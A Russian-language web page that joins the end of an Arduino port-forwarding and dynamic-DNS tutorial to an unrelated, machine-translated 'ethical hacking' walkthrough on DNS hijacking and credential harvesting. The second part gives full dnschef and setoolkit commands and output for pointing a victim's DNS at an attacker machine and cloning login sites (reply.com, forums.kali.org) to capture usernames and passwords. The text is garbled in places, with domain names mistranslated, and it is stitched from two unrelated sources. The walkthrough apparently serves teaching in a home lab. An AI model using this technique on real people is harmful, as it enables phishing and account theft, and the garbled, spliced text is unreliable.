После входа в маршрутизатор вы увидите страницу и меню по умолчанию для маршрутизатора.

Настройка и включение переадресации портов

Следующие инструкции относятся к маршрутизатору NETGEAR genie DGN2200v4 . Для другого маршрутизатора прочитайте документацию маршрутизатора или выполните поиск в Интернете, чтобы выполнить указанные ниже действия.

В веб-браузере после входа в маршрутизатор щелкните вкладку РАСШИРЕННЫЕ в верхней части страницы. Здесь вы сможете увидеть динамический IP-адрес, который ваш интернет-провайдер выдал вам, когда ваш маршрутизатор подключился к Интернету. Это показано как xxx. xxx.xxx.xxx на изображении ниже.

Динамический IP-адрес будет использоваться для доступа к Arduino. Если вы не можете найти IP-адрес в настройках маршрутизатора, погуглите «какой у меня IP».

Теперь щелкните пункт меню Advanced Setup в левом нижнем углу веб-страницы маршрутизатора, как показано на изображении выше. Это расширит меню.

Выберите пункт меню Port Forwarding / Port Triggering . Теперь установите перенаправление портов следующим образом:

1. Убедитесь, что переключатель Port Forwarding выбран.
2. Выберите HTTP(TCP:80) в раскрывающемся меню Имя службы .
3. Введите IP-адрес Arduino из скетча Arduino в поле IP-адрес сервера полей.
4. Нажмите кнопку +Добавить .

Проверка доступности Arduino в Интернете

После выполнения вышеуказанных настроек веб-сервер Arduino должен быть доступен из Интернета по IP-адресу, предоставленному вашим провайдером. к вашему ADSL-маршрутизатору.

Введите IP-адрес в адресную строку веб-браузера с устройства, не подключенного к вашей локальной сети, например. используйте смартфон с сотовой связью для передачи данных.

Теперь вы сможете видеть свой Arduino в Интернете. Если у вас есть статический IP-адрес, вы всегда можете найти Arduino по этому адресу, пока Arduino и маршрутизатор включены.

Если у вас динамический IP-адрес, то каждый раз, когда ваш IP-адрес меняется, вам нужно будет найти новый IP-адрес для подключения к веб-серверу Arduino.

На видео ниже показан доступ к Arduino через Интернет с помощью ПК и смартфона для отображения двух температур, измеряемых Arduino.

Видео не видно? Посмотреть на YouTube →

В следующем разделе этого руководства объясняется, как зарегистрироваться во внешней службе, чтобы предоставить вашему Arduino доменное имя, которое всегда будет указывать на ваш текущий IP-адрес.

Решение проблемы с динамическим IP-адресом

Маршрутизаторы NETGEAR позволяют вам использовать одну из нескольких внешних служб, которые предоставят вам доменное имя для вашего Arduino и будут обновлять доменное имя динамическим IP-адресом каждый раз, когда оно меняется.

Для других маршрутизаторов обратитесь к документации маршрутизатора или найдите решение в Интернете.

На маршрутизаторе NETGEAR вы можете либо подписаться на услугу в меню маршрутизатора, либо зарегистрироваться на веб-сайте поставщика услуг. В этом руководстве используется noip (www.noip.com), а регистрация осуществляется через их веб-сайт.

Чтобы зарегистрироваться непосредственно в маршрутизаторе, щелкните пункт меню Dynamic DNS под пунктом меню переадресации портов, который мы использовали в предыдущем разделе. Здесь вы сможете использовать noip сервис через NETGEAR (у NETGEAR есть соглашение с noip об использовании их сервиса).

Независимо от того, регистрируетесь ли вы с веб-страницы или в маршрутизаторе, нам потребуется одна и та же страница настроек Dynamic DNS .

Регистрация с помощью no-ip

Посетите веб-сайт no-ip и выберите пункт меню Dynamic DNS .

В разделе Free Dynamic DNS нажмите кнопку Free Sign Up .

Теперь вам нужно указать имя пользователя , пароль , электронная почта и имя хоста . Имя хоста будет именем, которое будет использоваться для доступа к вашему Arduino через ваш браузер в форме xxxx.ddns.net , где xxxx — это имя, которое вы выберете.

Когда вы закончите вводить указанные выше данные, нажмите кнопку Free Sign Up .

Вам нужно будет подтвердить свою учетную запись, проверив адрес электронной почты, с которым вы зарегистрировались, а затем щелкнув ссылку в адресе электронной почты.

Настройка службы динамического DNS без IP

Снова войдите в свой маршрутизатор, щелкните вкладку «Дополнительно», затем пункт меню «Дополнительные настройки», а затем Динамический DNS

Теперь установите флажок Использовать службу динамического DNS , а затем выберите NoIP. com из выпадающего списка справа, как показано на рисунке ниже.

Введите имя хоста (name_you_chose.ddns.net), Имя пользователя (имя пользователя без IP-адреса, с которым вы зарегистрировались) и Пароль (пароль без IP-адреса, с которым вы зарегистрировались). Нажмите кнопку Применить , чтобы закончить.

Теперь вы сможете получить доступ к Arduino из любого веб-браузера, используя новое доменное имя name_you_chose.ddns.net . Возможно, вам придется подождать несколько минут, пока он не начнет работать.

Всякий раз, когда ваш IP-адрес меняется, ваше доменное имя будет указывать на новый IP-адрес, поэтому вы всегда сможете получить доступ к своему веб-серверу Arduino.

Вы можете помочь веб-сайту Starting Electronics, сделав пожертвование:

Любое пожертвование высоко ценится и используется для оплаты текущих расходов этого веб-сайта. Нажмите кнопку ниже, чтобы сделать пожертвование.

Особые меры предосторожности

Теперь, когда ваш Arduino подключен к Интернету, к нему может получить доступ любой, кто знает его доменное имя или просканирует диапазон IP-адресов, включающий ваш IP-адрес Arduino. Вам нужно будет принять некоторые меры предосторожности, чтобы другие не получили доступ к вашему Arduino.

Не сообщайте никому свой IP-адрес и, что еще важнее, какое у вас доменное имя. Не публикуйте его нигде в Интернете.

Некоторая защита паролем была бы идеальной, чтобы попытаться предотвратить нежелательный доступ к вашему Arduino.

Это может не быть большой проблемой, если вы отображаете только некоторые температуры, но если вы отображаете информацию, которую хотите сохранить конфиденциальной, или ваш веб-сервер Arduino позволяет вам включать и выключать что-либо, тогда вы не хотите, чтобы кто-либо чтобы получить доступ к вашей веб-странице.

Этический взлом (часть 9): перехват DNS и сбор учетных данных | by Michael Whittle

Для этого руководства потребуются базовые знания о том, как работает DNS.

Основы DNS

DNS (система доменных имен) обеспечивает сопоставление удобочитаемого доменного имени, такого как reply.com, с IP-адресом. Представьте, что вам нужно рекламировать свой бизнес или просматривать сайты, используя IP-адреса. Было бы болезненно использовать адресацию IPv4, но с IPv6 это было бы почти непригодно. Разрешение DNS обеспечивает необходимые функции для работы Интернета.

На вашем устройстве (настольном компьютере, ноутбуке, планшете, телефоне и т. д.) будут настроены DNS-серверы. Например, общедоступные DNS-серверы Google — 8.8.8.8 и 8.8.4.4.

 kali@kali:~$  nslookup  >  сервер 8.8.8.8  
 Сервер по умолчанию: 8.8.8.8 
 Адрес: 8.8.8.8#53>  response.com  
 Адрес: 8.92.8 Сервер. 8.8#53Неавторитетный ответ: 
 Имя: reply.com 
 Адрес: 45.60.1.11 
 Имя: reply.com 
 Адрес: 45.60.5.11 

« nslookup » — это инструмент для проверки разрешения DNS. Если вы не укажете DNS « server », он будет использовать настройки DNS вашей системы, но вы можете переопределить его с помощью команды « server ». Я настраиваю его для использования 8.8.8.8, который является основным общедоступным DNS-сервером Google. Затем я набрал «reply.com», который разрешил IPv4-адрес 45.60.5.1.11. Адрес IPv4 будет использоваться для маршрутизации вашего запроса с вашего устройства на веб-сервер, на котором размещен веб-сайт Reply. Я упрощаю объяснение здесь, но на базовом уровне это то, что происходит.

Вот в чем проблема…

Что, если бы можно было каким-то образом перехватить DNS-запрос клиента. Таким образом, вместо официального DNS-сервера, отвечающего, что 45.60.5.11 — это IP-адрес веб-сервера, на котором размещен сайт Reply, а скорее 192.168.1.2, который является адресом моего сервера Kali в моей локальной сети. Это реальная проблема!

Мой внутренний IP-адрес моего сервера Kali не маршрутизируется публично, но это не означает, что вы не можете сделать его доступным через Интернет с помощью DMZ, облачного экземпляра, VPN и т. д. Для целей этого руководства и просто для продемонстрирую технику, которую я собираюсь использовать на своем локальном сервере Kali.

Если вам каким-то образом удалось получить доступ к маршрутизатору жертвы, вы можете включить атакующий DNS в качестве первого DNS-сервера в списке. Это означало бы, что при условии, что он включен, сначала будут запрашиваться настоящие DNS-серверы. Жертве на самом деле было бы все равно, что был добавлен дополнительный DNS-сервер, и даже если бы они увидели это, они бы даже засомневались в этом.

Подумайте обо всех домашних маршрутизаторах, которые на самом деле имеют учетные данные для входа в маршрутизатор на самом маршрутизаторе! Что, если бы вы смогли получить доступ к устройству жертвы с помощью эксплойта, описанного в другой моей статье «Этический взлом (часть 7): среда тестирования на проникновение Metasploit». Есть много способов сделать это, но я просто даю вам пищу для размышлений.

Мой экземпляр Kali linux работает на 192. 168.1.2, а мое устройство-жертва работает на 192.168.1.1. Я обновил настройки DNS на устройстве-жертве, чтобы 192.168.1.2 был в верхней части списка DNS-серверов в настройках TCP/IP. Если устройство вашей жертвы использует DHCP, вы также можете внести это изменение на DHCP-сервере (вероятно, на маршрутизаторе), что будет иметь тот же эффект. В рамках этого руководства я хочу продемонстрировать, как без проблем выполняется добавление и переключение на DNS-сервер злоумышленника. Устройство моей жертвы все еще работает нормально, хотя 192.168.1.2 пока не отвечает. Мои запросы будут сначала пробовать 192.168.1.2, а затем это не удастся, что в данный момент будет просто пробовать следующий DNS-сервер в списке. Для жертвы не очевидно, что произошли какие-либо изменения.

Перехват DNS

Мы собираемся использовать утилиту под названием « dnschef », которая поставляется вместе с Kali linux.

 kali@kali:~$  dnschef --help  
 использование: dnschef [опции]: 
 _ _ __ 
 | | версия 0. 4 | | / _| 
 __| |_ __ ___ ___| |__ ___| |_ 
 / _` | '_ \/ __|/ __| '_ \ / _ \ _| 
 | (_| | | | \__ \ (__| | | | __/ | 
 \__,_|_| |_|___/\___|_| |_|\___|_| 
 [email protected] это настраиваемый DNS-прокси для тестировщиков проникновения и аналитиков вредоносных программ 
. Он способен точно настроить, какие ответы DNS будут изменять 
 или просто проксировать с реальными ответами. Чтобы воспользоваться преимуществами инструмента 
, вы должны либо вручную настроить, либо отравить запись DNS-сервера, чтобы она указывала на 
 DNSChef. Инструмент требует привилегий суперпользователя для запуска на привилегированных портах. Дополнительные аргументы: 
 -h, --help показать это справочное сообщение и выйти 
 --fakedomains thesprawl.org,google.com 
 Список доменных имен, разделенных запятыми, который будет 
 преобразованы в значения FAKE, указанные в приведенных выше параметрах 
. Все остальные доменные имена будут преобразованы в 
 их истинных значений.  
 --truedomains thesprawl.org,google.com 
 Список доменных имен, разделенных запятыми, который будет равен 9.0216 преобразованы в их ИСТИННЫЕ значения. Все остальные доменные имена 
 будут преобразованы в поддельные значения, указанные в приведенных выше параметрах 
. Поддельные записи DNS:: 
 --fakeip 192.0.2.1 IP-адрес, используемый для сопоставления DNS-запросов. Если вы используете 
 этот параметр без указания доменных имен, то 
 все запросы 'A' будут подделаны. Рассмотрите возможность использования аргумента --file 
, если вам нужно определить более одного IP-адреса 
. 
 --fakeipv6 2001:db8::1 
 IPv6-адрес, используемый для сопоставления DNS-запросов. если вы 
 используйте этот параметр без указания доменных имен, 
 тогда все запросы 'AAAA' будут подделаны. Рассмотрите вариант 
 с использованием аргумента --file, если вам нужно определить более 
 одного IPv6-адреса. 
 --fakemail mail.fake.com 
 Имя MX для сопоставления DNS-запросов.  Если вы используете 
 этот параметр без указания доменных имен, то 
 все запросы MX будут подделаны. Рассмотрите возможность использования аргумента 
 --file, если вам нужно определить более одной записи MX 
. 
 --fakealias www.fake.com 
 Имя CNAME для сопоставления DNS-запросов. Если вы используете 
 этот параметр без указания доменных имен, то 
 все запросы 'CNAME' будут подделаны. Рассмотрите возможность использования аргумента 
 --file, если вам нужно определить более одной записи 
 CNAME. 
 --fakens ns.fake.com Имя NS для сопоставления DNS-запросов. Если вы используете 
 этот параметр без указания доменных имен, то 
 все запросы 'NS' будут подделаны. Рассмотрите возможность использования аргумента 
 --file, если вам нужно определить более одного NS 
 запись. 
 --file ФАЙЛ Укажите файл, содержащий список пар DOMAIN=IP 
 (по одной паре в строке), используемых для ответов DNS. Например, для 
: google.com=1.1.1.1 заставит все запросы к 
 'google. com' разрешаться в '1.1.1.1'. Адреса IPv6 
 будут обнаружены автоматически. Вы можете сделать 
 еще более конкретным, комбинируя --file с другими аргументами 
. Однако 
 данные, полученные из файла, будут иметь приоритет над другими. Необязательные параметры среды выполнения.: 
 --logfile ФАЙЛ Укажите файл журнала для записи всех действий 
 --nameservers 8.8.8.8#53 или 4.2.2.1#53#tcp или 2001:4860:4860::8888 
 Список разделенных запятыми DNS-серверов, альтернативных 
 для использования с прокси-запросами. Серверы имен могут иметь формат 
 IP или IP#PORT. Случайно выбранный сервер из 
 списка будет использоваться для прокси-запросов, если 
 предоставлено несколько серверов. По умолчанию инструмент использует 
 общедоступный DNS-сервер Google 8.8.8.8 при работе в режиме 
 IPv4 и 2001:4860:4860::8888 при работе в режиме 
 IPv6. 
 -i 127.0.0.1 или ::1, --interface 127.0.0.1 или ::1 
 Определите интерфейс для прослушивателя DNS.  По умолчанию 
 инструмент использует 127.0.0.1 для режима IPv4 и ::1 
 для режима IPv6. 
 -t, --tcp Использовать TCP DNS-прокси вместо UDP по умолчанию. 
 -6, --ipv6 Запустить в режиме IPv6. 
 -p 53, --port 53 Номер порта для прослушивания DNS-запросов. 
 -q, --quiet Не показывать заголовки. 

Существует множество параметров конфигурации, но цель этого руководства проста. Мы хотим захватить DNS при просмотре также answer.com.

 root@kali:~#  dnschef --fakeip=192.168.1.2 --fakedomains=reply.com --interface=0.0.0.0  
 _ _ __ 
 | | версия 0.4 | | / _| 
 __| |_ __ ___ ___| |__ ___| |_ 
 / _` | '_ \/ __|/ __| '_ \ / _ \ _| 
 | (_| | | | \__ \ (__| | | | __/ | 
 \__,_|_| |_|___/\___|_| |_|\___|_| 
 [email protected] (16:49:36) [*] DNSChef запущен на интерфейсе: 0.0.0.0 
 (16:49:36) [*] Использование следующих серверов имен: 8.8.8.8 
 (16:49:36) [*] Cooking A отвечает, чтобы указать на 192.168.1. 2 соответствие: response.com 

Сработало?

Я подошел к машине-жертве и запустил « nslookup ».

 %  NSLOKUP Ответить.com  
 Сервер: 192.168.1.2 
 Адрес: 192.168.1.2#53  Имя: Ответ.com 
 Адрес: 192.168.1.2  %  NSLookup WWW.REPLEP. 1.2 
 Адрес: 192.168.1.2#53  Имя: www.reply.com 
 Адрес: 192.168.1.2 

Вы видите, что моя машина-жертва теперь думает: « answer.com » разрешается в 192.168.1.2 вместо 45.60.5.1.11. Я имею в виду, что это довольно катастрофично.

Вы можете подумать: «Ну и что?». Веб-сервер не работает, так что какая разница, если жертва просматривает веб-сайт, который не отвечает, потому что не существует. Вы были бы правы, поэтому далее мы рассмотрим « settoolkit ».

Набор инструментов социальной инженерии (SET) — «setoolkit»
Это невероятно мощный инструмент с множеством функций. Я призываю вас исследовать и увидеть все, что он может предложить. Для целей этого урока я перейду к одной конкретной части, а именно к клонированию веб-сайта для сбора учетных данных.

Если вы запускаете « setoolkit » впервые, вам будет предложено принять заявление об отказе от ответственности, в котором говорится, что вы не собираетесь использовать его для чего-либо незаконного.

 root@kali:~#  settoolkit  . .. 
 МММММНМНММММ= 
 .ДММ. .MM$ 
 .MM. ММ,. 
 МН. мм. 
 .М. ММ 
 .М ..................... НМ 
 ММ .8888888888888888888. M7 
 .M 88888888888888888888. ,M 
 MM ..888.MMMMM . .М. 
 ММ 888.МММММММММ М 
 ММ 888.МММММММММ. М 
 ММ 888. НММММ. .М 
 М. 888.ММММММММММ. ЗМ 
 НМ. 888.МММММММММ М: 
 .М+ ..... ММ. 
 .ММ. .MD 
 мм . .ММ 
 $ММ .ММ. 
, мм? .MMM 
 ,MMMMMMMMMMM 
 https://www.trustedsec.com[---] The Social-Engineer Toolkit (SET) [---] 
 [---] Создано: Дэвид Кеннеди (ReL1K) [-- -] 
 Версия: 8. 0.3 
 Кодовое имя: 'Maverick' 
 [---] Подпишитесь на нас в Твиттере: @TrustedSec [---] 
 [---] Подпишитесь на меня в Твиттере: @HackingDave [---] 
 [---] Домашняя страница: https://www.trustedsec.com [---] 
 Добро пожаловать в Набор инструментов социальной инженерии (SET). 
 Единый магазин для всех ваших потребностей SE. Набор инструментов для социальных инженеров является продуктом TrustedSec. Посетите: https://www.trustedsec.com Его легко обновлять с помощью PenTesters Framework! (PTF) 
 Посетите https://github.com/trustedsec/ptf, чтобы обновить все свои инструменты! Выберите из меню:  1) Социально-инженерные атаки  
 2) Тестирование на проникновение (Fast-Track) 
 3) Третья сторона Модули 
 4) Обновите инструментарий социальной инженерии 
 5) Обновите конфигурацию SET 
 6) Справка, кредиты и информация99) Выйдите из Social-Engineer Toolkit> 

Выберите « 1 » для « Social-Engineering Attacks ».

 set> 1Выберите из меню: 1) Векторы целевой фишинговой атаки 
  2) Векторы атаки на веб-сайт  
 3) Генератор заразных медиа 
 4) Создать полезную нагрузку и прослушиватель 
 5) Массовая почтовая атака 
 6) На базе Arduino Вектор атаки 
 7) Вектор атаки беспроводной точки доступа 
 8) Генератор QRCode Attack Vector 
 9) Powershell Attack Vectors 
 10) Сторонние модули99) Вернитесь обратно в главное меню.set> 

Затем « 2 » для « Website Attack Vectors ».

 set>  2  Модуль веб-атаки   — это уникальный способ использования нескольких веб-атак для компрометации намеченной жертвы. Метод  Java Applet Attack  подделывает сертификат Java и доставляет полезную нагрузку на основе метасплойта. . Использует настраиваемый Java-апплет, созданный Томасом Вертом, для доставки полезной нагрузки. 9Метод 0238 Metasploit Browser Exploit  будет использовать выбранные эксплойты браузера Metasploit через iframe и доставлять полезную нагрузку Metasploit.  веб-сайт. Метод  TabNabbing  будет ждать, пока пользователь перейдет на другую вкладку, а затем обновит страницу на что-то другое. Метод  Web-Jacking Attack  был представлен white_sheep, emgent. В этом методе используются замены iframe, чтобы выделенная URL-ссылка казалась законной, однако при нажатии всплывающее окно заменяется вредоносной ссылкой. Вы можете отредактировать настройки замены ссылки в set_config, если она слишком медленная/быстрая.  Метод Multi-Attack  добавит комбинацию атак через меню веб-атак. Например, вы можете использовать апплет Java, браузер Metasploit, сборщик учетных данных/наложение вкладок одновременно, чтобы увидеть, какой из них успешен. Эксплуатация powershell на базе Windows через браузер. 1) Метод атаки Java-апплета 
 2) Метод эксплойта браузера Metasploit 
  3) Метод атаки сборщиком учетных данных  
 4) Метод атаки Tabnabbing 
 5) Метод атаки Web 
 6) Метод множественной атаки Web 
 7) Метод атаки HTA99) Возврат в главное меню:webattack> 

Выберите « 3 » или « Метод атаки сборщика учетных данных ».

 set:webattack>  3  Первый метод позволит SET импортировать список предварительно определенных веб-приложений 
, которые он может использовать в ходе атаки. Второй метод полностью клонирует веб-сайт по вашему выбору 
 и позволит вам использовать векторы атаки в пределах 
 того же самого веб-приложения, которое вы пытались клонировать. функциональность. 
 1) Веб-шаблоны 
  2) Клонировщик сайтов  
 3) Пользовательский импорт99) Вернуться в набор меню Webattack:webattack> 
 

Выберите « 2 » для « Клонировщик сайтов ».

Обратите внимание, что « settoolkit » будет запускать собственный веб-сервер. Если у вас запущен Apache или NGINX, он спросит вас, хотите ли вы остановить службу (что вы делаете, чтобы это работало). См. выделенные точки ниже жирным шрифтом .

 set:webattack>  2  
 [-] Сборщик учетных данных позволит вам использовать возможности клонирования в SET 
 [-] для сбора учетных данных или параметров с веб-сайта, а также для помещения их в отчет ----- -------------------------------------------------- ------------------------ 
 --- * ВАЖНО * ПРОЧИТАЙТЕ ЭТО ПЕРЕД ВВОДОМ IP-АДРЕСА * ВАЖНО * --- Это работает путем клонирования сайта и поиска полей формы для перезаписи 
.  Если поля POST не являются обычными методами отправки форм, это может привести к ошибке 
. Если это так, вы всегда можете сохранить HTML, переписать формы в стандартные формы 
 и использовать функцию «ИМПОРТ». Кроме того, действительно важно 
: если вы используете ВНЕШНИЙ IP-АДРЕС, вам нужно разместить ВНЕШНИЙ IP-адрес 
 ниже, а не ваш адрес NAT. Кроме того, если вы не знаете 
 основных сетевых концепций, и у вас есть частный IP-адрес, вам нужно будет 
 выполнить переадресацию портов на ваш IP-адрес NAT с вашего внешнего IP-адреса 
. Браузер не знает, как взаимодействовать с частным IP-адресом 
, поэтому, если вы не укажете внешний IP-адрес, если вы используете 
 с внешней точки зрения, это не сработает. Это не проблема SET 
, это то, как работает сеть. set:webattack> IP-адрес для POST обратно в Harvester/Tabnabbing [  192.168.1.2  ]: 
 [-] SET поддерживает как HTTP, так и HTTPS 
 [-] Пример: http://www.thisisafakesite.com 
 set:webattack> Введите URL для клонирования:  https://reply. com  [*] Клонирование веб-сайта:  https://reply.com  
 [*] Это может занять некоторое время... Лучше всего использовать эту атаку, если доступны поля формы имени пользователя и пароля. Несмотря на это, это фиксирует все POST-сообщения на веб-сайте. 
 [*] Атака сборщика учетных данных с помощью инструментария Social-Engineer Toolkit 
 [*] Сборщик учетных данных работает на порту 80 
 [*] Информация будет отображаться по мере поступления ниже: 
  [*] Похоже, веб-сервер не может привязаться к 80. Вы используете Apache или NGINX? 
 Вы хотите попытаться отключить Apache? [д/н]: y  
  Остановка apache2 (через systemctl): apache2.service. 
 Остановка nginx (через systemctl): nginx.service.  
 [*] Apache успешно остановлен. Запуск сборщика учетных данных. 
 [*] Harvester готов, пусть жертва зайдет на ваш сайт. 

Через несколько секунд ответный сайт был клонирован. Если я открою «http://192. 168.1.2», я вижу сайт ответов локально, и сайт выглядит точно так же. Журналы « settoolkit » выглядят так.

 192.168.1.1 - - [18.10.2020 22:08:58] "GET / HTTP/1.1" 200 - 
 192.168.1.1 - - [18.10.2020 22:08:58] "GET /index .html HTTP/1.1" 200 - 
 192.168.1.1 - - [18 октября 2020 г. 22:09:00] "GET /style%20library/scripts/mtiFontTrackingCode.js HTTP/1.1" 404 - 
 192.168.1.1 - - [18/окт/2020 22:09:00] «GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340102 HTTP/1.1» 404–
 [*] МЫ ПОЛУЧИЛИ ХИТ! Печать вывода: 
 ПАРАМЕТР: {"Шаблон":"[3,1,1,1]","Циклы":4,"Язык":2,"Теги":[],"TagsInOr":true," Sites":[1],"SortFields":["REUHomeOrderDate","REUValidityStartDate","Created"],"IsAscending":[false,false,false],"IsInHome":true,"IsInHomeSites":false," TemplateB1":"1Block","TemplateB2":"2Block","TemplateB3":"3Block","PagingInfo1":"Paged=TRUE 
 PARAM: p_REUHomeOrderDate=20140603 22:00:00 
 PARAM: p_REUValidityStartDate=20140501 07: 00:00 
 ПАРАМЕТР: p_Created=20140131 14:17:24 
 ПАРАМ: p_ID=5672","PagingInfo2":"","PagingInfo3":"Paged=TRUE 
 ПАРАМ: p_REUHomeOrderDate=20140825 22:00:00 
 ПАРАМ: p_REUValidityStartDate=20140825 22:00:00 
 PARAM=p_REUValidityStartDate=20140825 22:00:00 
 PARAM: 20140826 09:04:38 
 192. 168.1.1 - - [18 октября 2020 г. 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340103 HTTP/1.1" 404 - 
 ПАРАМ: p_ID=6728","HasMoreResults":true,"WidgetListName":"Содержание","PageNumber":2,"PageUrl":"https://www.reply.com/en/SitePages/HomePage.aspx ","CachePageUrl":"/en/sitepages/homepage.aspx","IsCacheActive":true,"HasFilters":false,"CacheAllWidgets":true,"IsPublicZone":true,"IsPast":false,"Title" :null,"ExcludeId":[15902,20899,19155,20793,20670,20515,19773,20373,19941,19600,19258,19847,19764,19230,19314,19315,19503,19373,19081,19172,66,19193182861,188861,1818 18977,18687,18724,18134,17104,18654,18373,18462,18470,18231,18276,18122,17864,18206,17546,17138,16705,17153,17049,16532,15619,16618,16298,16180,16418, 16272,14810,15043,13762,16279,15958,14584,14685,14194,14504,14395,13339,11709,11702,13173,11185,10736,11606,13646,10316,11577],"ll":null",11577 DateTo":null,"Типологии":null,"PageWidgetTemplates":[[5507,15],[5516,4],[5486,4],[6171,3],[5483,3],[5478,3 ],[2309,4],[5998,3],[6172,3],[6203,3],[5875,3],[5890,4],[2117,3],[6405,16],[5604,3 ],[6196,5],[2449,4],[5749,3],[5926,3],[5956,4],[5710,3],[6019,3],[1246,4], [5794,3],[5698,3],[5716,3],[1139,4],[5941,13],[5983,4],[1044,4],[5669,4],[6142 ,9],[6232,3],[5995,4],[5672,4],[2116,3],[6412,3],[5475,3],[5947,4],[6495,4 ],[5734,4],[9187,3],[7900,4],[8464,4],[1943,3],[10015,3],[6163,4]],"Пропустить":0 ,"Topic":null,"ExtraConditions":null,"ForcedTemplateID":-1,"FirstForcedTemplateID":-1} 
 [*] ПОСЛЕ ЗАВЕРШЕНИЯ РАБОТЫ, НАЖМИТЕ CONTROL-C, ЧТОБЫ СОЗДАТЬ ОТЧЕТ. 192.168.1.1 - - [18 октября 2020 г. 22:09:00] "POST /_layouts/15/reply.replyeu.wcm/getwidgetsasync.ashx HTTP/1.1" 302 - 
 192.168.1.1 - - [18 октября/ 2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/menuhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&ParentIDList=76,43&_=1603055340105 HTTP/1.1" 404 - 
 192.168.1.1 - - [18.10.2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/menuhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2% 2F&Mode=descendants&ParentIDList=2,8,14,21,25,29,45,34,37&_=1603055340104 HTTP/1.1" 404 - 
 192.168.1.1 - - [18.10.2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340106 HTTP/1.1" 404 - 
 192.168.1.1 - - [18 октября 2020 г. 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340107 HTTP/1.1" 404 - 
 192.168.1.1 - - [18 октября 2020 г. 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/cookiebannerhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&_=1603055340108 HTTP/1.1" 404 - 
 192.168. 1.1 - - [18.10.2020 22:09:00] "GET /_Incapsula_Resource?SWKMTFSR=1&e=0.5164617984924778 HTTP/1.1" 404 - 

И в моем браузере это выглядит так…

Абсолютно точное совпадение.

Теперь, если я удостоверюсь, что « dnschef » работает для « response.com » в одном терминале а « settoolkit » все еще работает в другом окне терминала, если я перейду к « www.reply.com » или « answer.com » на компьютере-жертве, сайт будет выглядеть точно так же. вы можете заметить разницу в том, что сайт использует HTTP вместо SSL.Если вы посмотрите рядом с URL-адресом браузера, он говорит « Not Secure » и блокировки нет. Это должно стать уроком, что вы всегда должны использовать HTTPS (SSL) вместо HTTP, и вы должны увидеть замок в браузере рядом с URL-адресом.

Если у вас возникли проблемы, убедитесь, что вы очистили кэш в своем браузере, закрыли все окна браузера и снова открыли их. Вам нужно будет убедиться, что вы не загружаете кешированную версию в браузере.

Это хорошо…

Это плохо…

Итак, все, что я сделал, это клонировал веб-сайт за несколько секунд, и хотя это впечатляет, учетные данные не были собраны.

Важным сообщением при клонировании сайта с помощью « settoolkit » было такое.

 Лучше всего использовать эту атаку, если доступны поля формы имени пользователя и пароля. Несмотря на это, это фиксирует все POST-сообщения на веб-сайте. 

Давайте попробуем найти сайт с формой входа на целевой странице, чтобы попробовать это.

Я буду использовать « https://forums.kali.org », так как это будет хороший пример. У него есть форма имени пользователя и пароля на целевой странице, так что мы готовы к работе.

В одном окне терминала Kali Linux я запускаю « dnschef ».

 root@kali:~#  dnschef --fakeip=192.168.1.2 --fakedomains=kali. org --interface=0.0.0.0  

В другом окне терминала Kali linux я клонирую сайт с помощью « setoolkit » .

 set:webattack> IP-адрес для POST обратно в Harvester/Tabnabbing [  192.168.1.2  ]: 
 [-] SET поддерживает как HTTP, так и HTTPS 
 [-] Пример: http://www.thisisafakesite.com 
 set:webattack> Введите URL для клонирования:  https://forums.kali.org  [*] Клонирование веб-сайта: https://forums.kali.org 
 [*] Это может занять некоторое время... Лучший способ использовать эту атаку, если имя пользователя и поля формы пароля доступны. Несмотря на это, это фиксирует все POST-сообщения на веб-сайте. 
 [*] Атака Credential Harvester с использованием инструментария Social-Engineer Toolkit 
 [*] Credential Harvester работает на порту 80 
 [*] Информация будет отображаться по мере поступления ниже: 

Я проверяю свою машину-жертву и DNS для форумов .kali.org разрешается до 192.168.1. 2.

 %  nslookup forums.kali.org  
 Сервер: 192.168.1.2 
 Адрес: 192.168.1.2#53Имя: forums.kali.org 
 Адрес: 192.168.1.2 

Теперь это очень важно Нам нужно убедиться, что браузер жертвы не кэширует исходный сайт. Очистите кеш и закройте окна браузера, чтобы быть уверенным. Когда вы это сделаете, откройте браузер и откройте « forums.kali.org ». Мы будем знать, что это сработало, потому что это покажет, что соединение будет использовать HTTP вместо HTTPS, и появится сообщение «9».0238 Незащищенный ».

В полях имени пользователя и пароля на странице я ввел « testuser » в качестве имени пользователя и « testpass » в качестве пароля. Поскольку мы на самом деле не посещаем форум Kali, вход в систему завершится ошибкой, но мы увидим данные для входа в журналы « settoolkit ».

 192.168.1.1 - - [18.10.2020 22:40:02] "GET / HTTP/1.1" 200 - 
 [*] УДАЧА! Вывод вывода: 
 ВОЗМОЖНОЕ ПОЛЕ ИМЯ ПОЛЬЗОВАТЕЛЯ НАЙДЕНО: vb_login_username=  testuser   
 POSSIBLE USERNAME FIELD FOUND: vb_login_password= 
 POSSIBLE PASSWORD FIELD FOUND: vb_login_password= 
 POSSIBLE USERNAME FIELD FOUND: vb_login_password_hint=  testpass   
 POSSIBLE PASSWORD FIELD FOUND: vb_login_password_hint=  testpass   
 PARAM: s=301f0571702614d88e1b330ebaa0751d 
 PARAM: securitytoken= guest 
 НАЙДЕНО ВОЗМОЖНОЕ ИМЯ ПОЛЬЗОВАТЕЛЯ: do=login 
 ВОЗМОЖНОЕ НАЙДЕННОЕ ПОЛЕ ИМЯ ПОЛЬЗОВАТЕЛЯ: vb_login_md5password= 
 НАЙДЕНО ВОЗМОЖНОЕ ПОЛЕ ПАРОЛЯ: vb_login_md5password= 
 НАЙДЕНО ВОЗМОЖНОЕ ПОЛЕ ИМЯ ПОЛЬЗОВАТЕЛЯ: vb_login_md5password_utf= 
 НАЙДЕНО ВОЗМОЖНОЕ ПОЛЕ ПАРОЛЯ: vb_login_md5password_utf= 
